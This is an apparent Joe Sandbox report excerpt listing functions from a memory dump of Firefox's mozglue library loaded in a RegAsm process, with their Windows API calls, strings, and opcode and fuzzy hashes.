                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$moz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3009372454-0
                                                                                    • Opcode ID: c460ce785199cab6adb93dbdd1c0e3dbbe5e313bd10e2dc493b5aa9849339720
                                                                                    • Instruction ID: cf682b1f15835d46b6035c11172d932af4b4838bf0ff15cb5a925ea8c3810931
                                                                                    • Opcode Fuzzy Hash: c460ce785199cab6adb93dbdd1c0e3dbbe5e313bd10e2dc493b5aa9849339720
                                                                                    • Instruction Fuzzy Hash: 52B1E371B051108FDB18DE2CC8D47BD76B2EF46328F184669E816DBBC6D7B1D8408B9A
                                                                                    Function 6C72AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                    • String ID:
                                                                                    • API String ID: 1192971331-0
                                                                                    • Opcode ID: 2ac825dd7206904f13d24a646b48438a904ce64cfbaf3912eb3eeacbbc99f349
                                                                                    • Instruction ID: e734c636354958532650523792c541a66bc941e839155362811692ecaeeafdc7
                                                                                    • Opcode Fuzzy Hash: 2ac825dd7206904f13d24a646b48438a904ce64cfbaf3912eb3eeacbbc99f349
                                                                                    • Instruction Fuzzy Hash: 073162B1904B048FDB00BF7CD64966EBBF4BF85315F01893DE99987215EB74A848CB82
                                                                                    Function 6C6D9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C6D9675
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D9697
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6D96E8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C6D9707
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D971F
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6D9773
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6D97B7
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D97D0
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D97EB
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6D9824
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                    • API String ID: 409848716-3880535382
                                                                                    • Opcode ID: 6596f8f5aab6d34fde6658bc7fe980a91291b5cbead54da609cbdc3019298766
                                                                                    • Instruction ID: e7171e580d4be88597d618c0dfefe948edcade72ee7936de2077d6e5a45bed2d
                                                                                    • Opcode Fuzzy Hash: 6596f8f5aab6d34fde6658bc7fe980a91291b5cbead54da609cbdc3019298766
                                                                                    • Instruction Fuzzy Hash: B04100707006059BDF00EFB4DA94A9A7BB5EB4A32CF41813AED1587740DB34B904CBA4
                                                                                    Function 6C710000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C710039
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C710041
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C710075
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C710082
                                                                                    • moz_xmalloc.MOZGLUE(00000048), ref: 6C710090
                                                                                    • free.MOZGLUE(?), ref: 6C710104
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C71011B
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C71005B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                    • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                    • API String ID: 3012294017-637075127
                                                                                    • Opcode ID: 3aec143e8585752566c02389d0d3da096ead71c666ff145ebff144321c0230ea
                                                                                    • Instruction ID: 6442c1a49de802e032e3a3d1900dc508b93d55a0f1aa6a1a5c5a6b628e768c9f
                                                                                    • Opcode Fuzzy Hash: 3aec143e8585752566c02389d0d3da096ead71c666ff145ebff144321c0230ea
                                                                                    • Instruction Fuzzy Hash: 4641CDB5600744DFCB10DF68C944A9ABBF1FF4A328F44852EE96A83B40DB31B815CB95
                                                                                    Function 6C6D7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6D7EA7
                                                                                    • malloc.MOZGLUE(00000001), ref: 6C6D7EB3
                                                                                      • Part of subcall function 6C6DCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C6DCB49
                                                                                      • Part of subcall function 6C6DCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C6DCBB6
                                                                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C6D7EC4
                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C6D7F19
                                                                                    • malloc.MOZGLUE(?), ref: 6C6D7F36
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6D7F4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                    • String ID: d
                                                                                    • API String ID: 204725295-2564639436
                                                                                    • Opcode ID: fbf11bb9527e4e8bb47a22cac0c1a7e1a93085dff8a9524c250cf349dda5609c
                                                                                    • Instruction ID: 7b7717cd23c942647b34ef43fac8c590323c3dcb6fe2e62d8070c9f8a5e24b5b
                                                                                    • Opcode Fuzzy Hash: fbf11bb9527e4e8bb47a22cac0c1a7e1a93085dff8a9524c250cf349dda5609c
                                                                                    • Instruction Fuzzy Hash: 1E310561E0025C97DB00AB68CC049FEB778EF96318F059629ED499B612FB30A588C399
                                                                                    Function 6C6D3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL ref: 6C6D3EEE
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6D3FDC
                                                                                    • RtlAllocateHeap.NTDLL ref: 6C6D4006
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6D40A1
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C6D3CCC), ref: 6C6D40AF
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C6D3CCC), ref: 6C6D40C2
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6D4134
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C6D3CCC), ref: 6C6D4143
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C6D3CCC), ref: 6C6D4157
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$Heap$StringUnicode$Allocate
                                                                                    • String ID:
                                                                                    • API String ID: 3680524765-0
                                                                                    • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                    • Instruction ID: 6a009c823b33986a8875344f284922f215ddb7b44970e7852167a58793937b56
                                                                                    • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                    • Instruction Fuzzy Hash: 1BA18FB1A00215CFDB40CF28C880769B7B5FF48308F2A41A9D909AF742D771EC86CBA4
                                                                                    Function 6C6C2030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(00000000,?,6C6E3F47,?,?,?,6C6E3F47,6C6E1A70,?), ref: 6C6C207F
                                                                                    • memset.VCRUNTIME140(?,000000E5,6C6E3F47,?,6C6E3F47,6C6E1A70,?), ref: 6C6C20DD
                                                                                    • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C6E3F47,6C6E1A70,?), ref: 6C6C211A
                                                                                    • EnterCriticalSection.KERNEL32(6C74E744,?,6C6E3F47,6C6E1A70,?), ref: 6C6C2145
                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C6E3F47,6C6E1A70,?), ref: 6C6C21BA
                                                                                    • EnterCriticalSection.KERNEL32(6C74E744,?,6C6E3F47,6C6E1A70,?), ref: 6C6C21E0
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E744,?,6C6E3F47,6C6E1A70,?), ref: 6C6C2232
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                    • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                    • API String ID: 889484744-884734703
                                                                                    • Opcode ID: 5eb1fa176b39f2136949b9e7a9165c0df1b2abdac38eb836e7762ee38a02ef3e
                                                                                    • Instruction ID: 576cf74588c87ed7058a760be095489e3955ef4b72d58c16169f8715ca2aaefc
                                                                                    • Opcode Fuzzy Hash: 5eb1fa176b39f2136949b9e7a9165c0df1b2abdac38eb836e7762ee38a02ef3e
                                                                                    • Instruction Fuzzy Hash: 8761F931F042158FCB04DE78C989B6E77B5EF85328F158136EA24A7B94D7709D00C78A
                                                                                    Function 6C719D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C718273), ref: 6C719D65
                                                                                    • free.MOZGLUE(6C718273,?), ref: 6C719D7C
                                                                                    • free.MOZGLUE(?,?), ref: 6C719D92
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C719E0F
                                                                                    • free.MOZGLUE(6C71946B,?,?), ref: 6C719E24
                                                                                    • free.MOZGLUE(?,?,?), ref: 6C719E3A
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C719EC8
                                                                                    • free.MOZGLUE(6C71946B,?,?,?), ref: 6C719EDF
                                                                                    • free.MOZGLUE(?,?,?,?), ref: 6C719EF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                    • String ID:
                                                                                    • API String ID: 956590011-0
                                                                                    • Opcode ID: eb9e2caa80bd7aadcccb593515610985ff057c1de2e1e5162db7738baa1c60e6
                                                                                    • Instruction ID: fe201dd45fa612d9d2ded724f75e9b34d306b576844a32d07ddb4365bb4bae9d
                                                                                    • Opcode Fuzzy Hash: eb9e2caa80bd7aadcccb593515610985ff057c1de2e1e5162db7738baa1c60e6
                                                                                    • Instruction Fuzzy Hash: 0371A17190AB418BD712CF18C54055BF3F4FFA9315B44865EE89A9BB11EB30E886CBC5
                                                                                    Function 6C71DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C71DDCF
                                                                                      • Part of subcall function 6C6FFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6FFA4B
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C7190FF
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C719108
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71DE0D
                                                                                    • free.MOZGLUE(00000000), ref: 6C71DE41
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71DE5F
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71DEA3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71DEE9
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C70DEFD,?,6C6D4A68), ref: 6C71DF32
                                                                                      • Part of subcall function 6C71DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C71DB86
                                                                                      • Part of subcall function 6C71DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C71DC0E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C70DEFD,?,6C6D4A68), ref: 6C71DF65
                                                                                    • free.MOZGLUE(?), ref: 6C71DF80
                                                                                      • Part of subcall function 6C6E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6E5EDB
                                                                                      • Part of subcall function 6C6E5E90: memset.VCRUNTIME140(ewrl,000000E5,?), ref: 6C6E5F27
                                                                                      • Part of subcall function 6C6E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6E5FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                    • String ID:
                                                                                    • API String ID: 112305417-0
                                                                                    • Opcode ID: 9c22471b1ff4433038e5b7b6a5774adfb0c39aebaa0ca28267d9b3eca51d4c33
                                                                                    • Instruction ID: a9b2ab7939a19b41583c3db68c4f6d1e51046b319bfbe1bf3b461f1ab91aa347
                                                                                    • Opcode Fuzzy Hash: 9c22471b1ff4433038e5b7b6a5774adfb0c39aebaa0ca28267d9b3eca51d4c33
                                                                                    • Instruction Fuzzy Hash: 4D511C726096009BD7129B18CA842AE737ABFB5309F5D012DD41A53F11D731F91ECF9A
                                                                                    Function 6C725D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725D32
                                                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725D62
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725D6D
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725D84
                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725DA4
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725DC9
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C725DDB
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725E00
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725E45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 2325513730-0
                                                                                    • Opcode ID: 790f294c923c446a6fb057cfd824f9d22ee4642197f32015eb2b93fa32267e54
                                                                                    • Instruction ID: 8542c35af589e2b232e35df1b824315ece26903998f885ed170efa4bda7600b6
                                                                                    • Opcode Fuzzy Hash: 790f294c923c446a6fb057cfd824f9d22ee4642197f32015eb2b93fa32267e54
                                                                                    • Instruction Fuzzy Hash: 18417F70B002049FCB00EF65D9D9AAE77B5AF89318F544079D50A9B795EB34EC05CF51
                                                                                    Function 6C6FCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6C31A7), ref: 6C6FCDDD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 4275171209-2186867486
                                                                                    • Opcode ID: abc266a20bd9e11aabcaca49faa281ec195840b37d2d76864e8ccdeb009634f4
                                                                                    • Instruction ID: 49c85311d0ce21e04b8e13d31db6f05a22ab99fb100d9dca1c69b3d9b391719e
                                                                                    • Opcode Fuzzy Hash: abc266a20bd9e11aabcaca49faa281ec195840b37d2d76864e8ccdeb009634f4
                                                                                    • Instruction Fuzzy Hash: C231A7317412056BFB24BF758C45BAE7B77BF41728F208025F526ABAC0DB70E9028799
                                                                                    Function 6C6CECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6CF100: LoadLibraryW.KERNEL32(shell32,?,6C73D020), ref: 6C6CF122
                                                                                      • Part of subcall function 6C6CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6CF132
                                                                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6C6CED50
                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6CEDAC
                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C6CEDCC
                                                                                    • CreateFileW.KERNEL32 ref: 6C6CEE08
                                                                                    • free.MOZGLUE(00000000), ref: 6C6CEE27
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C6CEE32
                                                                                      • Part of subcall function 6C6CEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C6CEBB5
                                                                                      • Part of subcall function 6C6CEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C6FD7F3), ref: 6C6CEBC3
                                                                                      • Part of subcall function 6C6CEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C6FD7F3), ref: 6C6CEBD6
                                                                                    Strings
                                                                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C6CEDC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
